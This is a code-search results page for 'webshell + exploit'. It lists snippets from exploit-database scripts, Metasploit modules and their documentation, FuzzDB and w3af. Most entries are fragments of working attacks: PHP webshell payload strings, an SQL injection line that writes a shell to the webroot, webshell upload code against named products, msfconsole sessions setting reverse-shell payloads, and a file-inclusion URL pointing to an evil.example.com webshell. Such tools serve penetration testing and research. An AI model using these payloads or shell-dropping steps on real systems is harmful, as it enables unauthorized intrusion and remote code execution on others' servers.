50+ results for 'webshell + exploit'

15964.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 308 lines

1: #!/usr/bin/python
2: # Lotus CMS Fraise v3.0 LFI - Remote Code Execution Exploit
3: # greetz Tecr0C :0)
21: #
22: # exploit includes:
23: # - Proxy support
35: #	| -------------------------------------------- |
36: #	| Lotus CMS v3.0 Remote Code Execution Exploit |
37: #	| by mr_me - net-ninja.net ------------------- |
38: #
39: # (+) Exploiting target @: 192.168.56.101/webapps/lotus/lcms/
40: # (+) Testing proxy @ localhost:8080.. proxy is found to be working!
42: # (+) Writing comment.. comment shell written sucessfully
43: # (+) Writing webshell d8e8fca2dc0f896fd7cb4cb0031ba249.php to the webroot..
44: # (+) Entering interactive remote console (q for quit)

caidao_php_backdoor_exec.rb https://gitlab.com/alx741/metasploit-framework | Ruby | 72 lines

9: class Metasploit4 < Msf::Exploit::Remote
10:   Rank = ExcellentRanking
12:   include Msf::Exploit::Remote::HttpClient
17:       'Description'       => %q{
18:         This module takes advantage of the China Chopper Webshell that is
19:         commonly used by Chinese hackers.
26:           ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
27:           ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
28:           ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
61:     if res && res.body =~ /#{flag}/m
62:       Exploit::CheckCode::Vulnerable
63:     else

README.md https://gitlab.com/MisterCh0c1/fuzzdb | Markdown | 92 lines

24: **Attack Patterns -**
25: Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases.
26: FuzzDB contains comprehensive lists of [attack payloads](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack-payloads) known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.
33: **Other useful stuff -**
34: Webshells, common password and username lists, and some handy wordlists.
35: (https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors) etc etc etc
58:   * analysis of error messages
59:   * researching old web exploits for repeatable attack strings
60:   * scraping scanner payloads from http logs
80:   * in training materials and documentation
81:   * to learn about software exploitation techniques

caidao_php_backdoor_exec.rb https://gitlab.com/0072016/metasploit-framework-rapid7 | Ruby | 72 lines

9: class MetasploitModule < Msf::Exploit::Remote
10:   Rank = ExcellentRanking
12:   include Msf::Exploit::Remote::HttpClient
17:       'Description'       => %q{
18:         This module takes advantage of the China Chopper Webshell that is
19:         commonly used by Chinese hackers.
26:           ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
27:           ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
28:           ['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A']
61:     if res && res.body =~ /#{flag}/m
62:       Exploit::CheckCode::Vulnerable
63:     else

emelco-1.2.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1457 lines

18:   EMelCo PHP WebShell v1.2
19:   Written by >> s E t H <<
52:    [+] Modify leerarchivo() so that it uses shell() with cat
53:    [+] Add rootexploits
54:    [+] Add php exploits
102: $nombre = 'EMeLCo WebShell v1.2';

emelco-1.4.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1800 lines

18:   EMelCo PHP WebShell v1.4
19:   Written by >> s E t H <<
48:     [!] Fixed a bug in the chmod form
49:     [!] If the php version is not affected by the bug, the checkbox for the ini_restore exploit is not shown
50:     [+] Function to delete itself
61:     [!] Remove the "No se puede leer /var/log/messages porque supera los 50000 bytes" messages, or turn them into a link
62:     [+] Add rootexploits
63:     [+] Add php exploits
107: $nombre = 'EMeLCo WebShell v1.4';

emelco-1.3.php http://emelco.googlecode.com/svn/trunk/ | PHP | 1808 lines

18:   EMelCo PHP WebShell v1.3
19:   Written by >> s E t H <<
58:    [!] Remove the "No se puede leer /var/log/messages porque supera los 50000 bytes" messages, or turn them into a link
59:    [+] Add rootexploits
60:    [+] Add php exploits
102: $nombre = 'EMeLCo WebShell v1.3';

25606.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 92 lines

1: # Exploit Title: Kimai 0.9.2.1306-3 SQLi
2: # Date: 05/20/2013
3: # Exploit Author: drone (@dronesec)
4: # Vendor Homepage: http://www.kimai.org/
25: def webshell(options, id):
26:     """ dat webshell
55:     if options.shell:
56:         return webshell(options, id)

34431.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 142 lines

5: Successful exploitation requires that 'nagiosadmin' be logged into the web interface.
7: Attackers can exploit these issues to gain unauthorized access to the affected application and perform certain administrative actions.
55: Modify nagios command to create a webshell when run

24359.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 119 lines

7: Successful exploitation of this issue may allow an attacker to execute malicious script code on a vulnerable server.
23:         YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
24:         This Proof of Concept creates a small webshell script on the server
25:         that we can use to exec commands on the server.
27:         It then creates a crafted comment saved in a new .php file. This comment
28:         contains an encoded webshell. Once this .php file is opened, the code
29:         contained creates acidwebshell.php.
66: /*  This is my webshell script generator. It contains the webshell encoded
67:         to avoid magic_quotes and urldecode altering the content of the script. */
84: echo "[+] Creating WebShell Script ... ";

20342.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 248 lines

2: /*
3: # Exploit Title: WespaJuris <= 3.0 auto exploit
4: # Date: 07th August 2012
13: Use this exploit to upload a webshell on vulnerable applications.
14: Usage:
44: 	[!]  Exploit complete.
45: 	[i]  You have now a webshell in <http://localhost/juris/clientdir/30/dl/webshell.php>
47: Then, go to http://localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
49: :: How does this exploit work? Manual procedure.

8765.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 97 lines

3: print_r('
4: ********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
91:     sent($sock);
92: 	echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
93: 	die;}

nagios_xi_autodiscovery_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 226 lines

143: [*] Auxiliary module execution completed
144: msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
145: [*] Using configured payload linux/x86/meterpreter/reverse_tcp
146: msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
147: target => 0
197: PASSWORD => labpass1
198: msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
199: DELETE_WEBSHELL => false
200: msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
201: WEBSHELL_NAME => lobster.php
202: msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

18266.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 282 lines

32: #
33: # Exploit requirement:
34: # --------------------
42: #		+==============================================================================================+
43: #		| Open Conference/Journal/Harvester Systems <= 2.3.X csrf/upload/remote code execution exploit |
44: #		| Found by: mr_me						 	  		       |
53: #
54: # (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134.
55: # (-) Code injection and execution failed!
59: #
60: # (+) Exploit sent to the client target 127.0.0.1 attacking 192.168.220.134.
61: # (!) Code injection worked!
62: # (!) Launching webshell..!
63: #

pfsense_diag_routes_webshell.md https://github.com/rapid7/metasploit-framework.git | Markdown | 162 lines

28: * Follow the installation instructions above
29: * Do: `use exploit/unix/http/pfsense_diag_routes_webshell`
30: * Do: `set username <name>`
78: [*] Using configured payload bsd/x64/shell_reverse_tcp
79: msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set USERNAME diag_only
80: USERNAME => diag_only
124: USERNAME => diag_only
125: msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set PASSWORD labpass1
126: PASSWORD => labpass1
128: RHOST => 10.0.0.10
129: msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check
132: [+] 10.0.0.10:80 - The target is vulnerable.
133: msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set LHOST 10.0.0.2
134: LHOST => 10.0.0.2

16980.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 153 lines

2: # ~INFORMATION
3: # Exploit Title:	If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
4: # Author:		TecR0c
48: |----------------------------------------|
49: |Exploit: If-CMS 2.07 LFI RCE
50: |Author: %s
100: def postRequestWebShell(encodedCommand):
101:         webSiteUrl = url.geturl()+'.shell.php'
134:                         encodedCommand = base64.b64encode(command)
135:                         response = postRequestWebShell(encodedCommand)
136:                         print response
138:                         encodedCommand = base64.b64encode('rm .shell.php')
139:                         postRequestWebShell(encodedCommand)
140:                         print "\n[!] Removed .shell.php\n"

nagios_xi_magpie_debug.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 246 lines

6: class MetasploitModule < Msf::Exploit::Remote
7:   Rank = ExcellentRanking
9:   include Msf::Exploit::EXE
10:   include Msf::Exploit::FileDropper
11:   include Msf::Exploit::Remote::HttpClient
12:   include Msf::Exploit::Remote::HttpServer::HTML
13:   prepend Msf::Exploit::Remote::AutoCheck
20:         'Description' => %q{
21:           This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
22:           CVE-2018-15708 which allows for unauthenticated remote code execution

make_deb.sh https://bitbucket.org/jarrettchisholm/oscar.git | Shell | 484 lines

61: # v 24 - Updated reOscar to reOscar2.sh, added ichppccode table, missing HRMDocuments column and many indices to patch.sql
62: # v 25 - More indices added to patch.sql and web.xml added to OscarDocuments and moved OscarDocuments to prevent webshell exploit
63: # v 26 - Updated Rich Text Letter and moved OscarDocuments to prevent webshell exploit

39982.rb https://bitbucket.org/DinoRex99/exploit-database.git | Ruby | 69 lines

1: # Exploit Title: Airia - Webshell Upload Vulnerability
2: # Date: 2016-06-20
3: # Exploit Author: HaHwul
4: # Exploit Author Blog: www.hahwul.com
13: if ARGV.length !=2
14: puts "Airia Webshell Upload Exploit(Vulnerability)"
15: puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]"
18: puts "  Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'"
19: puts "  exploit & code by hahwul[www.hahwul.com]"
35: request["Content-Type"] = "application/x-www-form-urlencoded"
36: request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"})
37: response = http.request(request)
50: output: Airia Webshell Exploit123

19007.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 126 lines

1: <?php
2: # Exploit Title: PHPNet <= 1.8 (ler.php) SQL Injection
3: # Exploit Author: WhiteCollarGroup
15:   ~> SQL Injection
16: This exploit is for a vulnerability in ler.php, but the same vulnerability exists in imprimir.php and imagem.php.
17: ler.php?id=[SQLi]
32:   After opening the administration panel, try to add a new article.
33:   Use the upload form to upload your webshell.
34:   After posting, access:
63: echo "PHPNet <= 1.8 SQLi Exploit\n";
64: echo "Discovered by WhiteCollarGroup\n";
118:     if($i==0) {
119:         echo "[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.";
120:     } else {

36202.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 330 lines

5: # Seagate Business NAS pre-authentication remote code execution
6: # exploit as root user.
7: #
17: # - -c   : (optional) create a cookie which will give admin access.
18: #          Not specifying this flag results in webshell installation.
19: # - ua   : (optional) the user agent used by the browser for the
60: hostname = ''
61: webshell = str(uuid.uuid1()) + ".php"
196:     url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
197:     req = urllib2.Request(url, headers = headers, data = post_data)
226:     print ""
227:     print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
228:     print "  - OJ Reeves (@TheColonial) - https://beyondbinary.io/"

caidao_php_backdoor_exec.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 69 lines

6: class MetasploitModule < Msf::Exploit::Remote
7:   Rank = ExcellentRanking
9:   include Msf::Exploit::Remote::HttpClient
14:       'Description'       => %q{
15:         This module takes advantage of the China Chopper Webshell that is
16:         commonly used by Chinese hackers.
23:           ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
24:           ['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
25:           ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA15-313A']
58:     if res && res.body =~ /#{flag}/m
59:       Exploit::CheckCode::Vulnerable
60:     else

17003.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 202 lines

2: # ~INFORMATION
3: # Exploit Title:        iCMS v1.1 Admin SQLi/bruteforce Exploit
4: # Author:               TecR0c
45: sitePath = '/var/www/iCMS/icms/'
46: webshell = '<?php+system(base64_decode($_REQUEST[cmd]));?>'
65: |----------------------------------------|
66: |Exploit: iCMS SQLi RCE
67: |Author: %s
151:         "admin/item_detail.php?id=1+UNION+SELECT+NULL,'TECR0CSHELL"\
152:         +webshell+"LLEHSC0RCET'+INTO+OUTFILE+'"+sitePath+".webshell.php'"
153:         opener.open(webSiteUrl)
154:         print '[+] Wrote WEBSHELL !'
155:     else:

44825.html https://bitbucket.org/DinoRex99/exploit-database.git | HTML | 33 lines

1: # Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
2: # Date: 2018-06-02
3: # Exploit Author: xichao
4: # Vendor Homepage: https://github.com/GreenCMS/GreenCMS
24:      <input type="hidden" name="content" value="<?php phpinfo();?>">
25:     <button type="submit" value="Submit">WebShell</button>
26:     </form>

22128.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 239 lines

3: A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun.
9: /*
10:  * Local r00t exploit for Webshell 2.4 (possibly other versions).
11:  * Vulnerability found and exploit written by Carl Livitt
49: #define SHELLSCRIPT_FILE "/tmp/zz"
50: #define EXPLOIT_FILE "/tmp/.webshell.txt"
51: #define ROOT_SHELL "/tmp/rs"
130:                 if((pid=fork())==0) {
131:                         system(WEBSHELL_PROGRAM" < "EXPLOIT_FILE" &>/dev/null");
132:                         exit(0);
167:         if((fp=fopen(EXPLOIT_FILE,"w"))==NULL) {
168:                 printf("Could not create exploit file %s\n", EXPLOIT_FILE);
169:                 exit(1);

22454.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 339 lines

174: 			}
175: 			send(websock, exploit_buf, strlen(exploit_buf), 0);
176: 			//len=recv(websock, buf, sizeof(buf)-1, 0);
264: 	sprintf(exploit_buf,"GET %s HTTP/1.1\n",location);
265: 	sprintf(exploit_buf,"%sHost: %s\n",exploit_buf,target);
266: 	sprintf(exploit_buf,"%sAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\n", exploit_buf);
267: 	sprintf(exploit_buf,"%sAccept-Language: en-gb, en;q=0.66, en-us;q=0.33\n", exploit_buf);
268: 	sprintf(exploit_buf,"%sAccept-Encoding: gzip, deflate, compress;q=0.9\n", exploit_buf);
269: 	sprintf(exploit_buf,"%sAccept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66\n", exploit_buf);
270: 	sprintf(exploit_buf,"%sCookie: ck_ams=00000; ck_amsv=11043763620; ck_sid=3J4EUD0l4Juf1ev-06103517452.aa\n", exploit_buf);
271: 	sprintf(exploit_buf,"%sAccept-Encoding: %s\n\n",exploit_buf, sc);
272: 	//printf("%s\n\n", exploit_buf);

dlink_central_wifimanager_sqli.md https://github.com/rapid7/metasploit-framework.git | Markdown | 180 lines

3: This module exploits a vulnerability in Dlink Central
4: WifiManager (CWM-100), found in versions lower than
31: - set action ...
32: - `check` or `exploit`
33: - should work as in the scenarios below
179: (copy ... to ...), but using full paths, the attacker must know the path of the webroot
180: to upload a webshell this way.

19060.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 132 lines

1: <?php
2: # Exploit Title: TheBlog <= 2.0 SQL Injection
3: # Exploit author: WhiteCollarGroup
43: 	After getting admin access, click "Upload" in the menu.
44: 	Upload your webshell using the form. A link will appear in the file list ("Lista de Arquivos").
46:  > What's this exploit?
47: 	It is a PoC for SQL Injection on "index.php?id=".
48: 	How to use:
49: 	php exploit.php <target>
50: 	Example:
51: 	php exploit.php http://target.com/blog/

lrfi.html https://bitbucket.org/rmusser/infosec-reference.git | HTML | 186 lines

107:                         <br />
108:                         /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
109:                         <br />
112:                         <br />
113:                         /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
114:                         <br />
115:                         Executes code from an already uploaded file called exploit.php (local
116:                         file inclusion vulnerability)
141:                         <li>
142:                             <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/">
143:                                 Exploiting PHP File Inclusion – Overview « Reiners’ Weblog

zimbra_xxe_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 48 lines

3: This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
15: 1. `./msfconsole -q`
16: 2. `use exploit/linux/http/zimbra_xxe_rce`
17: 3. `set rhosts <rhost>`
18: 4. `set lhost <lhost>`
19: 5. `exploit`
25: ```
26: msf5 exploit(linux/http/zimbra_xxe_rce) > exploit

shopware_createinstancefromnamedarguments_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 283 lines

6: class MetasploitModule < Msf::Exploit::Remote
7:   Rank = ExcellentRanking
9:   include Msf::Exploit::Remote::HttpClient
10:   include Msf::Exploit::FileDropper
15:       'Description' => %q(
16:         This module exploits a php object instantiation vulnerability that can lead to RCE in
17:         Shopware. An authenticated backend user could exploit the vulnerability.
22:         An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
23:         the target system, resulting in remote code execution.
36:           ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
37:           ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
38:         ],

pfsense_diag_routes_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 227 lines

84:       OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
85:       OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
86:     ]
151:   def drop_webshell
152:     webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
153:     print_status("Uploading webshell to #{webshell_location}")
181:     if datastore['DELETE_WEBSHELL']
182:       register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
183:     end
197:       'method' => 'GET',
198:       'uri' => normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}"),
199:       'vars_get' => {
214:     # create a randomish web shell name if the user doesn't specify one
215:     @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"

22129.c https://bitbucket.org/DinoRex99/exploit-database.git | C | 325 lines
                    
11/*
                    
12 * Remote r00t exploit for Webshell 2.4 (possibly other versions).
                    
13 * Vulnerability found and exploit written by Carl Livitt
                    
30gcc -o webshell-remote webshell-remote.c
                    
31./webshell-remote -t www.host-to-exploit.com -l /path/to/webshell
                    
32
                    
101"-P port      Port to bind shell on remote host [10000]\n"
                    
102"-l location  Location of webshell (eg. /cgi-bin/webshell)\n\n"
                    
103"Example:\n\n"
                    
287        sprintf(exploit_buf,"%sAccept-Encoding: %s\n",exploit_buf, sc);
                    
288        sprintf(exploit_buf,"%s%s\n",exploit_buf,egg);
                    
289        sprintf(exploit_buf,"%sContent-Length: %d\n\n",exploit_buf,EGG_SIZE*2);
                    
290        sprintf(exploit_buf,"%s--%s\n",exploit_buf, egg+CONTENT_LENGTH);
                    
291        sprintf(exploit_buf,"%sContent-Disposition: form-data; name=\"TESTNAME\"; filename=\"TESTFILENAME\"\r\n\r\n",exploit_buf);
                    
292        sprintf(exploit_buf,"%s%-*s\n",exploit_buf, EGG_SIZE*4," ");
                    
                
9556.php https://bitbucket.org/DinoRex99/exploit-database.git | PHP | 37 lines
                    
3+---------------------------------------------------------------------------+
                    
4osCommerce Online Merchant 2.2 RC2a RCE Exploit
                    
5by Flyh4t
                    
9Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
                    
10Thx to exploits of blackh
                    
11+---------------------------------------------------------------------------+
                    
33fputs($fd,$message);
                    
34echo ("[+]Go to see U webshell : $host/fly.php");
                    
35?>
                    
                
nagios_xi_autodiscovery_webshell.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 238 lines
                    
89      OptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]),
                    
90      OptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]),
                    
91      OptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true])
                    
148    # drop a basic web shell on the server
                    
149    webshell_location = normalize_uri(target_uri.path, "#{@webshell_uri}#{@webshell_name}")
                    
150    print_status("Uploading webshell to #{webshell_location}")
                    
181    if datastore['DELETE_WEBSHELL']
                    
182      register_file_for_cleanup("#{@webshell_path}#{@webshell_name}")
                    
183    end
                    
196        'mode' => 'deletejob',
                    
197        'job' => "#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}"
                    
198      }
                    
223    # create a randomish web shell name if the user doesn't specify one
                    
224    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(5..12)}.php"
                    
225
                    
                
rce_check.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 93 lines
                    
20      if version < Rex::Version.new(fixed_version)
                    
21        matching_exploits = add_cve_module_to_hash(matching_exploits, info)
                    
22      end
                    
30        if version == Rex::Version.new(fixed_version)
                    
31          matching_exploits = add_cve_module_to_hash(matching_exploits, info)
                    
32        end
                    
66      if version >= lower && version <= higher
                    
67        matching_exploits = add_cve_module_to_hash(matching_exploits, info)
                    
68      end
                    
76  #
                    
77  # @param matching_exploits [Hash] maps CVE numbers to exploit module names
                    
78  # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1
                    
78  # @param cve_module_array [Array] contains arrays with a CVE number at index 0 and a matching exploit at index 1
                    
79  # @return [Hash] updated list of matching exploits, mapping CVE numbers to exploit module names
                    
80  def add_cve_module_to_hash(matching_exploits, cve_module_array)
                    
                
17510.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 91 lines
                    
2# coding=utf-8
                    
3# pma3 - phpMyAdmin3 remote code execute exploit
                    
4# Author: wofeiwo<wofeiwo@80sec.com>
                    
19    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code
                    
20execute exploit"
                    
21    print "Usage: %s <PMA_url>" % program
                    
63        # ����setup��ȡshell
                    
64        print "[+] Trying get webshell.."
                    
65        postdata =
                    
85        else:
                    
86            print "[-] Cannot get webshell."
                    
87
                    
                
39691.py https://bitbucket.org/DinoRex99/exploit-database.git | Python | 105 lines
                    
1# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
                    
2# Exploit Author: Zhou Yu <504137480@qq.com >
                    
19
                    
20webshell_content='''
                    
21<%@ page import="java.util.*,java.io.*"  %>
                    
42post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
                    
43post_data = post_data + "\r\nwebshell.jsp\r\n"
                    
44post_data = post_data + "--" + boundary + "\r\n"
                    
56post_data = post_data + "--" + boundary + "\r\n"
                    
57post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
                    
58post_data = post_data + "Content-Type: text/plain\r\n"
                    
58post_data = post_data + "Content-Type: text/plain\r\n"
                    
59post_data = post_data + "\r\n" + webshell_content +"\r\n"
                    
60post_data = post_data + "--" + boundary + "\r\n"
                    
75        print "[+]upload done!"
                    
76        webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
                    
77        print "[+]wait a moment,detecting whether the webshell exists..."
                    
                
exchange_proxyshell_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 142 lines
                    
25    1. If no email address is specified
                    
26        1. The exploit will leverage the SSRF to issue a reques to EWS and enumerate the email addresses
                    
27            * This technique was taken from [dmassland/proxyshell-poc](https://github.com/dmaasland/proxyshell-poc/blob/main/proxyshell-enumerate.py)
                    
31        * Email addresses are mapped to SIDs using a request to autodiscover and MAPI
                    
321. A draft email is saved to the identified user's mailbox containing an encoded webshell embedded within an attachment
                    
331. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location
                    
331. The `New-MailboxExportRequest` cmdlet is used to export the attachment and write the webshell to an accessible location
                    
341. The exploit waits for the webshell to be written and uses it to execute OS commands
                    
351. The webshell*, export request and draft email are all removed
                    
94```
                    
95msf6 > use exploit/windows/http/exchange_proxyshell_rce
                    
96[*] Using configured payload windows/x64/meterpreter/reverse_tcp
                    
104[+] 192.168.159.42:443 - The target is vulnerable.
                    
105msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
                    
106
                    
                
zimbra_xxe_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 258 lines
                    
5
                    
6class MetasploitModule < Msf::Exploit::Remote
                    
7  Rank = ExcellentRanking
                    
8
                    
9  include Msf::Exploit::Remote::HttpClient
                    
10  include Msf::Exploit::Remote::HttpServer
                    
10  include Msf::Exploit::Remote::HttpServer
                    
11  include Msf::Exploit::FileDropper
                    
12
                    
16      'Description'    => %q{
                    
17        This module exploits an XML external entity vulnerability and a
                    
18        server side request forgery to get unauthenticated code execution
                    
26        cookie. After gaining an admin cookie the Client Upload servlet is
                    
27        used to upload a JSP webshell that can be triggered from the web
                    
28        server to get command execution on the host. The issues reportedly
                    
                
vmware_vcenter_uploadova_rce.md https://github.com/rapid7/metasploit-framework.git | Markdown | 179 lines
                    
10Note that later vulnerable versions of the Linux appliance aren't
                    
11exploitable via the webshell technique. Furthermore, writing an SSH
                    
12public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the
                    
47patched. Later vulnerable versions of the Linux appliance aren't
                    
48exploitable via the webshell technique. I haven't been able to download
                    
49and test them all. Sorry.
                    
90```
                    
91msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce
                    
92[*] Using configured payload java/jsp_shell_reverse_tcp
                    
92[*] Using configured payload java/jsp_shell_reverse_tcp
                    
93msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options
                    
94
                    
115
                    
116Exploit target:
                    
117
                    
                
vmware_vcenter_uploadova_rce.rb https://github.com/rapid7/metasploit-framework.git | Ruby | 236 lines
                    
5
                    
6class MetasploitModule < Msf::Exploit::Remote
                    
7
                    
10
                    
11  prepend Msf::Exploit::Remote::AutoCheck
                    
12  include Msf::Exploit::Remote::CheckModule
                    
12  include Msf::Exploit::Remote::CheckModule
                    
13  include Msf::Exploit::Remote::HttpClient
                    
14  include Msf::Exploit::FileDropper
                    
21        'Description' => %q{
                    
22          This module exploits an unauthenticated OVA file upload and path
                    
23          traversal in VMware vCenter Server to write a JSP payload to a
                    
27          Note that later vulnerable versions of the Linux appliance aren't
                    
28          exploitable via the webshell technique. Furthermore, writing an SSH
                    
29          public key to /home/vsphere-ui/.ssh/authorized_keys works, but the
                    
                
caidao_php_backdoor_exec.md https://bitbucket.org/DinoRex99/metasploit-framework.git | Markdown | 44 lines
                    
1China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
                    
2
                    
10  2. Start msfconsole
                    
11  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
                    
12  4. Do: `set rport port`
                    
17```
                    
18  8. Do: `exploit`
                    
19  9. You should get a shell.
                    
33```
                    
34msf exploit(caidao_php_backdoor_exec) > exploit
                    
35
                    
                
shell_handler.py https://github.com/andresriancho/w3af.git | Python | 171 lines
                    
36
                    
37def get_webshells(extension, force_extension=False):
                    
38    """
                    
38    """
                    
39    This method returns a webshell content to be used in exploits, based on
                    
40    the extension, or based on the x-powered-by header.
                    
45    """
                    
46    return _get_file_list('webshell', extension, force_extension)
                    
47
                    
54    """
                    
55    Similar to get_webshells but returns a code that when it is evaluated runs
                    
56    `command` in the operating system.
                    
58    Example:
                    
59        get_webshells() returns:
                    
60            "<?  system( $_GET['cmd'] )    ?>"
                    
                
dav.py https://github.com/andresriancho/w3af.git | Python | 191 lines
                    
57
                    
58        Then the exploit plugin that exploits os_commanding
                    
59        ( attack.os_commanding ) should return 'os_commanding' in this method.
                    
114                om.out.debug(msg)
                    
115                self._exploit_url = exploit_url
                    
116                return True
                    
127        :return: This method returns the probability of getting a root shell
                    
128                 using this attack plugin. This is used by the "exploit *"
                    
129                 function to order the plugins and first try to exploit the
                    
129                 function to order the plugins and first try to exploit the
                    
130                 more critical ones. This method should return 0 for an exploit
                    
131                 that will never return a root shell, and 1 for an exploit that
                    
153        
                    
